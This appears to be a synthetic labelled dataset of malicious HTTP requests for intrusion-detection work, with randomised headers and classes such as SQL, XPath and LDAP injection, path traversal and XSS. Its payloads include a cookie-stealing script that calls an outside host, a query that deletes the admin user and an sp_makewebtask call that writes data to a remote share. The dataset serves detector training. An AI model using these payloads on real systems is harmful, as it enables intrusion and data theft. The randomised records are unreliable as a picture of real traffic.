fuhilohn=tueaohndo&7llnlt7eBhmyoe6=edprasrnesi&hlIasptojn=n'h&l-Mwinntg-G_=epy&7swearseM=oKZ4uc&bhklipmtosnn=lNdtfEqsba6uceYkan&medixntian=efmZnWt6m&eooislesmoeswr=rtmpwh&ypbctgahvEE=908103&dchgt=>/ ?phpuisio0 en&EooiOAddwnolte=c0gEtmqfam&trbcsxxzr=8&oio79pee=aCSs0aKo@85&etdcTdxii4=0744957&dTdaeeonrhHtd4=d04

End - Id: 46004
Start - Id: 48842
class: XPathInjection
GET /d4wEwigNri/t9sonhrsmh/Q-3EYBV/yB7PGXr2lZRKrBr./dg/gBNe2DRn/dYvA.SBI-mU/kUG/oW4X-R_wKuG7e/e0nenilmsIdgirdLi/nuiseiaetuiaU/dropbyh9cd.CZiJKI.mspx?od4scmnehfi=%3Fz%3F%3CEil+5pcoJscT%5Bi&ra0uievtesmottu=5i%2Ft%2Fn1%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D8%5D+++%7C+++++t%2Fifdsog%2FthHrt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D649%5D+or+++%2741ns%27%3D+++%27&egiscue=oeKby6lS HTTP/1.1
Host: www.etdnd.gov:80
Connection: keep-alive
Accept: video/*, video/*, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: elbwonty-teefD5, uta-do, evdzi-gt;q=0.0, keEuh-o6ssosbi;q=0.8
Cache-Control: no-store
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="999"
Date: Fri, 09 Sep 05 20:12:42 UTC
ETag: "Gx4UstfDiJNRaQGH8X"
Expect: 100-continue
From: w2h3rar@tkko9pi.org
If-Modified-Since: Fri, 12 Mar 10 04:40:14 UTC
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Dec 08 12:10:35 GMT
Max-Forwards: 984
MIME-Version: 9.5
Pragma: yt28lanr='yeugo'
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: /ese1/orpoeyts.swf
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (Windows; U; Win 9x 8.8; oh-tf; rv:9.4.8) Gecko/24782674
UA-CPU: StrongARM
UA-Disp: 780,9634,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: HTTP/7.0 www.1elw.gif
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48842
Start - Id: 36228
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 200.54.38.224:80
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.5
Accept-Charset: cp-950, euc-tw, iso-2022-jp;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.131.95.224
Cookie: lmk=14323658;9vEaruSX9s=sVh;X4djkYd=ma;4enlcberds=wSN6AsmXMGN;yeareaeTe=dgobject4;6EhauscAidfowh1=s
Cookie2: $Version="298"
Date: Mon, 28 Jul 08 04:00:29 CET
ETag: "HNKW6sLk9FvzbJhDh2r"
Expect: 100-continue
From: nssow@cMarn.uk
If-Modified-Since: Thu, 01 Jan 09 13:07:46 UTC
If-Unmodified-Since: Tue, 13 Jan 04 07:01:18 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: *
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 5
MIME-Version: 9.7
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: jgtf ycvyehcy=no4v1
Range: 183-
Referer: http://astroam.biz/oivxtsne/m7tiraf.swf
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 4.4; ea-oi; rv:2.3.7) Gecko/71037313
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: HTTP/9.5 216.210.143.188
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36228
Start - Id: 38314
class: LdapInjection
GET /hyteohflal2euqs/rr0xAyigetnhi/4xrB4/3-J_dA0.ToyWem/2te2aNb8z08qE_vT6t/i-E.Hhg/ixFpv0LUYO_.ab.-wC8/orusruXLaP/Ursaras/hieil.asp?shdininsmlyl=lb4f%25&nepO=linkp%3Fcuufitmpeladmin%3A&trirez=rtcMa2epaV&87_7connect=r0hPZeYx9i&oTa=Vete&ueEDSseheGt=l7ag&w7I36=6&tp=%29%28++++%7C+%28++cn%3D*o+++%27brien*++++%29%28mail+%3D*o++%27brien*+++%29+&iao=u2wd0xltdcai7s9&0zeBr4nGsteo=939153&ne=htaccesziR2where9xha8rCboot.iniilink-object3d HTTP/1.1
Host: www.mte0ecla.gov
Connection: close
Accept: audio/*, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: clzeaa-pshEi;q=0.9, retBc-nsTu6ni, oj03tTIL-wiee;q=0.2, roatrn-aeae, ia-So;q=0.9
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: 9taenrJs0o7=enu;systemImoNIwGuP=851903;telOole4r0rme=(rpoL;htn4m=1home deni5tiawrse;3BlwJVjI4KB=3008
Cookie2: $Version="54"
Date: Sun, 19 Feb 06 02:54:30 CET
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Wed, 21 Apr 10 21:17:29 GMT
If-Unmodified-Since: Thu, 20 Mar 08 19:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: "@7znIY5e@yzVbsruyqZz"
Max-Forwards: 7
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest realm
Range: 768701-8
Referer: /otEa/5wgA.exe
TE: trailers,trailers
Trailer: Pragma
User-Agent: osneebenw5 (epTZBbJ3mp; dCnoBR2ZT-; hr_H7H7; oPyvU9CEz; dJQcUrUXLJ)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/7.4 151.224.181.30
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 81.254.156.128
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38314
Start - Id: 49657
class: XPathInjection
GET /uaknrgiie/48l7LYt1UGhrCHAK/rnqier/4V8_tgjfSi04XTQe8/uIYz0B7/t4Xnnrrt/flntsiiyHLiibArehns8/tJU43.sh?eteursT5odso=00&dtetdtvt=k3ma%27+++++or++%28i+%3C++count%28sn%2Fchild%3A%3Atext%28%29%29++++and+++j+++%3C+++count%28nxwM6h%2Fchild%3A%3Acomment%28%29%29+and++k+%3C+++count%28Mth%2Fchild%3A%3A*%29++%29++++or++%27etr8t%27++%3D++++%27+++Itn8nH%27+++or&ilnl1sTzao=550704 HTTP/1.1
Host: 26.198.16.154
Connection: lnnr
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1
Accept-Language: r-reXzts;q=0.6, l-hue, Ft-02p7Lom, iG-8, a-Si;q=0.8
Cache-Control: no-cache
Client-ip: 135.193.196.43
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Sat, 04 Aug 07 06:14:30 GMT
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Mon, 17 Aug 09 20:47:14 CET
If-Match: "OFrsvFLNKlVPwxRtkp-k"
If-None-Match: *
If-Range: "UR2K2DBnbkqhR.d@B"
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -377,00-3
Referer: http://www.tNtesl7l.it/kewcu/xogs6ucf/i4otTu/ap3ki.gz
TE: trailers,gzip;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/5.4 (Windows; U; Win98 1.5; 5e-el; rv:2.1.3) Gecko/32581877
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
Via: 5.4 129.10.237.16
Transfer-Encoding: gzip
Upgrade: nn7ooi/9.0
Warning: 369 www.8nrabs.html "Ssfefi" "Wed, 10 Oct 07 11:26:24 CET"
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49657
Start - Id: 42397
class: SqlInjection
GET /eTrFod/nteamfoNattenew/dO/maotnRetmMwatdshebaw/fc1DTqbetween/smyM4Tp./t9ooi0o3/3sbJB_AiH.js?2enUuooenwieLnv=26433&e3tcohlw=avi4rga6sri&R_eZOH6=odoetlNpV2cmBae6&WAlnMlEc=8dandSzeeh4&ialj3h=%25tfocts&vpntf=%24she&tpa4efs=071943&8hdagKd7=eBk6lJSYfxL&a7rsa=luh6neheTcaan&eoleL4ap8nuqs=htt%27ptn&te=t--nrc+8or&inth=8825&neeo0ae=54&fneR=99277&rimely4Oeot=or++++0%3C%3E%28select+count%28*%29+++from++sesehhrw%29 HTTP/1.0
Host: www.hodEuaos.org:80
Connection: Sltiiqd
Accept: text/*, video/mpeg
Accept-Charset: iso-8859-6, x-mac-korean;q=0.4, iso-2022-jp, koi8-r
Accept-Encoding: gzip, gzip, gzip, identity, gzip
Accept-Language: eNettnLo-ttg8etr, jet-ente4Gs;q=0.2, 3rtphe7r-rhAte;q=0.3, GFiv-ob9e
Cache-Control: no-store
Client-ip: 44.95.147.247
Cookie: am=905741;fsyAeaiti=eer Nynqhrtmpu;uodreweuvo=253;ltcn=09a~ht)ls?clike)optsc6c sg;XnjtmV=ourWee;a6pedhn=8490517788
Cookie2: $Version="2"
Date: Thu, 09 Aug 07 08:26:48 CET
ETag: "eKuxmXnYHAGMAoO0C"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 28 Jan 07 02:26:27 CET
If-Unmodified-Since: Sat, 22 Dec 07 10:17:03 UTC
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: "joLoFYDvupL9su_"
Max-Forwards: 60
MIME-Version: 2.5
Pragma: OeoQea=izOe2nr
Proxy-Authorization: 0egwt ei2a=faen96m
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: http://tjeEd.org/8cuttI8/euiilaht/mqlt/pohn.cfm
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 8.4; hh-ze; rv:5.3.1) Gecko/86429376
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: aiax7a/0.1 www.etentnnn.html, 6.1 www.dieeee.jpg:42837, 3.7 21.158.233.206
Transfer-Encoding: cuei
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 630 www.qHomhe.tiff "xvqr" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42397
Start - Id: 44931
class: PathTransversal
GET /lfG/sa7hrHefndrali/d45lsWZcVGdAxx5XR1/steewx7ric/ctconDjmo77/j0mgWPNI.nJ-apLAamFQ/sateCneatt/ua/e4@XPsAKsz4_HR/rflFZqnx68e.J7S/2uczkbsi.mdb?1N-b=d&LqwPS=.%2F..%2F..%2F..%2F..%2F..%2F&KNg=tter7tyae&lo=5ryi9R&img7v-go58xscript-9=bol5xXDA&nbdtip451awni=nthAunion&PcnEei16eaHcge=ehsalhDe&nbjeeSoeaaeRod=383083179 HTTP/1.0
Host: 227.29.169.199
Connection: close
Accept: audio/*, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ee-d, oSb-doq7I3t;q=0.3, o-Aaeo, mW-ibe;q=0.8, tinOn-ed
Cache-Control: no-transform
Client-ip: 119.33.88.93
Cookie: eyec=2insz3eH;eriS=xgp.yv;fysc=g@mal
Cookie2: $Version="19"
Date: Mon, 02 Feb 04 10:24:08 GMT
ETag: W/"XLxzFuV8SXEFv.mqCY"
Expect: laocgTl
From: naaodg1@I4Nh.uk
If-Modified-Since: Sun, 17 Feb 08 05:03:23 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "R9.6u-DR1RLZuPZH5Zf6"
If-None-Match: *
If-Range: Sun, 10 May 09 10:14:13 UTC
Max-Forwards: 8
MIME-Version: 7.1
Pragma: De=scotyld
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: NTLM dGFlZWVIYmplZXJuZW9ob25lZHRlb3JoaXRydXdvQTdhdGFXMXRuaW5qYVM=
Range: 965978-,-986,-07275
Referer: http://www.iioah5s.net/nu8A/noole/unt6/rournr.css
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: ieoai1iedtinnmt3n3
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: FTP/4.5 200.137.112.171, 4.9 105.115.92.138:05, 4.3 188.225.88.105
Transfer-Encoding: ynde; Rakeoa=p9wimii
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44931
Start - Id: 35234
class: SqlInjection
GET /evThQNcnmWj5F/tjhipT1a/the3qn9m/rD8UoLmgeUes9SPy/sneDCUiugoEmGtm3/ogtlnuleoeCeailt.tiff?H4nph-L8Ncopy-Zjsk=n&FrN=netcatwi%3Frfrb+tmp7s&IetcoptJT=+aphpT3%2B5&5lmnwstretW=iftis&6ulkter=ayIfimg3etn&hewssgcgfoyou4o=8318746&3Qome3nnlhr0z9t=furio%27%29%3BDELETEFROMusersWHEREupper%28username%29+++%3Dupper%28+%27admin&munv3cAhry=eaieue&0Hisant=dXqp6d33X HTTP/1.1
Host: www.oetH3sr.it
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.8, x-mac-arabic, iso-8859-5;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: Ms-l;q=0.5, isSz-eeOac, gieho-4i, ioffLa-noea;q=0.2, s-sEpr7;q=0.4
Cache-Control: max-age=6
Client-ip: 61.19.198.20
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="55"
Date: Thu, 23 Mar 06 24:06:44 GMT
ETag: "rHuQDmKzfY2ZnTLVvsn7"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Sat, 14 Nov 09 10:32:54 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Tue, 31 Jan 06 23:25:19 GMT
Max-Forwards: 1595
MIME-Version: 1.1
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Basic eHJjZXJlQ0U6b2VoTm9w
Range: -5631,75-
Referer: http://odmph.st/Lseoinal/tddihas/mdbcta2m/ttnhlrs/ienh.js
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: ym342n64u1 http://www.n8eetrah.be
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 0.5 www.aiom.js, peI/9.7 www.eleett.jpeg:7, FTP/1.7 5.145.27.180:51704
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35234
Start - Id: 47146
class: XSS
GET /ccopync69/5b/j9pec66eu/eHDK/cl1cmddocumentXlogBQtmprUB/ndoil4E46Pl1/kxp_/ftoeelmrwo/uSwdT/oPyP5oKJJh/kWFzH-Td4stdin.cgi?etl=36015&7eotnldr6nna=O1zyjxe1&tI4fhnrcdoFmy=3566035&spnNhnold=ti9r&yanAmrqsfed=Hs6pteis&aNueale=T1rhflaracceptetu%2B&dadL7tp=2417&u3MRikn0=%3Cimg+++dynsrc+%3D++++%22++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.enrosi.com%2Fcgi-bin%2Folro.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&ew=u4h1%260WOasbodysn58lAp HTTP/1.0
Host: www.htoode.cz
Connection: keep-alive
Accept: audio/*;q=0.7, text/*;q=0.7, image/png;q=0.6
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 13.138.53.141
Cookie: eysas2jtuxsooY2=vt3zijylf;rr=EeSimytfoe )dh(z@;n5oees8h=4066565169;Z6oirlF@Ggroup by8J=an:
Cookie2: $Version="5"
Date: Sat, 08 Jan 05 19:17:26 UTC
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: tnrpsa=tPsspxH
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Fri, 06 Oct 06 15:10:52 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: "jJzAUVFXaY6WV9J_Gu"
Max-Forwards: 77
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: NTLM dGlFdG9kcGY5aHN1b2FtbGFpcmU3cmhwaXRuM0lhZWNpZXJlYWVkaA==
Range: 9848-585788,73810-,9-
Referer: http://ttsit.de/zhiz/VThdiy/O2oot/nchatrr.js
TE: trailers,gzip,chunked;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 8.4; tl-oq; rv:1.3.4) Gecko/03134041
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/9.8 www.yyniHem.shtml, 1.9 49.41.27.228, 8.8 151.56.170.120:729
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47146
Start - Id: 49595
class: XPathInjection
GET /bfa/e0TDbR/rquDt1HM@YjKqi8r/UkNARt.9TcjFm.1/e0/f0ogarhyabetdwn7aetF/Lnsates8odinrca3/nHsDElIZNACojb7/zqn@G.nsf?mdcTida=gaiw&NwnY=60634560&EwinntoDJ5access_log=+m2&ttd1qhppi=170qY&2rxSsi=305054&xdeleteCqScatzJ0=caan&qDoTiezbe2ps4t=286650&lrLxa=r&yTsi_d3NfSMu=jnhPst&UfOiC7u=h2fuN3eou&q5aa8lMu=l_P5k_E&sfnin0=4335617&lo=l%2Ffqsc%3D&ots=iruSfobn%27+++++or+++1%3C+++gtt%2Fe%2Fnetr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or+++%27tfotnt%27%3D+%27 HTTP/1.0
Host: www.eLdoeTaue.uk
Connection: close
Accept: application/zip, application/x-tar, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: H-8Mg;q=0.3
Cache-Control: min-fresh=8
Client-ip: 132.114.34.1
Cookie: on=1233701;i7twaatl4=honsy0eAeMi;oi9rernsajait=h~3[~tdeTntelshe;ww=mn2v;ee7pnhaneaElad=tTdyOg884;6bsel=ln+4ont3kybp
Cookie2: $Version="81"
Date: Wed, 20 Oct 04 08:03:49 CET
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: wiNgsai@oernriaeee.de
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "LO9b7hYY9eNClVead"
If-None-Match: *
If-Range: "VG00Mw9pd70WJk."
Max-Forwards: 5
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: NTLM aWNvZW5zc3NvbnRpbjZlYW1tYWVhcnNlVGVkZWh1d3dhZGVoYWU=
Range: 124-314534,89-
Referer: /ntarse1/tuavdgli/wnrea/eDeats.css
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Range
User-Agent: Mozilla/6.4 (compatible; MSIE 9.8; Open BSD i586; klrcee; eTOa)
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 122x540
Via: pen/3.9 www.netdBan7.png, 8l2i/4.1 www.igeeddb.tiff
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49595
Start - Id: 46836
class: XSS
PUT /nse/tmstrswasthener4eoeo/el@Sbdq0MoX8t.Hvs/Yhj/tnnlr/ccMXGmh3.pl? HTTP/1.0
Content-Length: 221
Content-Language: sfl8tdf,h8
Content-Encoding: gzip
Content-Location: http://www.boinme.uk/he0nos/eckooa8/nafsa/ai0Lt/tl0yora.msf
Content-MD5: bmhhYXRjdGh0ZWUyaERhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Aug 04 21:12:40 GMT
Last-Modified: Wed, 14 Sep 05 11:14:56 GMT
Host: www.sEadohsno.it
Connection: close
Accept: image/jpeg
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-8-i;q=0.3, cp-950, windows-1258
Accept-Encoding: identity, deflate;q=0.6, gzip;q=0.5, deflate;q=0.7, gzip;q=0.8
Accept-Language: denT-j;q=0.7, aw8gnk-nlsabt, acdh-hzhsns;q=0.0, adr-t9
Cache-Control: s9tlaern='cdb6'
Client-ip: 169.136.109.14
Cookie: csrtl5r=n7jchildh;dgtfeecvaiid=81677145
Cookie2: $Version="027"
Date: Tue, 02 Sep 08 10:29:26 UTC
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Fri, 18 Mar 05 11:38:57 UTC
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: "8GA@JKhk@20w68W-nV"
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 3696
MIME-Version: 5.0
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://fleifzr.biz/petoais/oodyemn/9uca.swf
TE: trailers,gzip;q=0.9
Trailer: If-None-Match
User-Agent: rzdpi2a
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 6.3 251.194.107.11
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 92.3.241.226
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BwS5C=tebj35oa&enaeoucohm=6&sacald9oed0u=cava5lesr9&50WOCDM_X@c=na&aleo=stdin&hhyhm=[\xC0][\xBC]script>[alert('mbc');][\xC0][\xBC]/script >&eeges=8 f5m&srytsrsltDhoir=eNesngsher

End - Id: 46836
Start - Id: 41082
class: SqlInjection
GET /aeir/ibgcNE8dJvarBjZQ.php4?sr=65ELdsghrlErvh&steqr5y8=833726201&jhn7env=%27%3B++EXEC++master..sp_makewebtask+%22%5C%5C226.79.141.93%5CAatxw%5CeoenleqS.js%22%2C+++%22SELECT+*+FROM+++++INFORMATION_SCHEMA.TABLES%22&tzerueexd=ufladeo&eoU3artee8rt=6318&J9k2g62vqoc=tef2wvYU7&tq=yDsxOu9U&a1i3hex40oi8tae=5515&etyKtmsbeia=pyMuwo+o2er6 HTTP/1.0
Host: www.tcomhg.org:80
Connection: tijbsaH
Accept: application/x-tar;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.8, compress;q=0.0, identity
Accept-Language: eraxo5r3-qtcP6pe, qh-nrXnde, myaal-r;q=0.2, 39g-h
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="633"
Date: Sun, 16 Sep 07 19:12:45 GMT
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 05 Nov 04 18:58:00 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: "tHW-C8o-m99bI8N"
If-None-Match: "aRXBru0w8uSbkRYDvhx"
If-Range: Wed, 18 Nov 09 08:08:09 GMT
Max-Forwards: 5
MIME-Version: 7.6
Pragma: oltcia='goBi'
Proxy-Authorization: Digest username="seeg"
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: /uvrnjQt/reJbdIl/81Htstf/debsro/gdw8pet0.asp
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/7.0 (X11; U; Unix 7.5; su-ai; rv:3.1.3) Gecko/48733586
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/5.1 www.nHxnaz.jpg:262
Transfer-Encoding: compress
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41082
Start - Id: 49140
class: XPathInjection
GET /sbDHMUngZrEbheLM9/ool9elCbgVd_UHgv/tnsatpeis5odf.aspx?ipzeaw3aiNikth=9300&tnevhTimsoem=dztdgrasteE2Ebs8sv&Lnh7tcesueO=611313468&E2t0oeafnrb6ie=itRrsckrmFei%29a5&etssdwo=l5hfdui%27%5D+++++%7C++++P+++++%7C+%2F%2Fuser%5B+++name%2Ftext%28%29+++%3D++%27ypl&eafxynneh=Ta%24open&t0pshilmbnd=hiereplaces%3Au+l%3Etdiv%27&dofinorls6=347&istwicpymdawedl=EcGimop%7Cf%3Ba&nsCeeneelsoryle=a&uoAhdserlgK6kea=ynbie&caxutjhl=kIheasock_streamned-E9iae HTTP/1.1
Host: 47.241.36.25
Connection: close
Accept: application/x-tar, text/*;q=0.9, image/*;q=0.8
Accept-Charset: us-ascii;q=0.0, iso-8859-15;q=0.9, iso-8859-2, big5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: max-age=100
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="925"
Date: Thu, 29 Sep 05 08:16:11 UTC
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: hstr@4dfys6.de
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Wed, 11 Feb 04 12:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Jun 08 06:35:04 CET
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
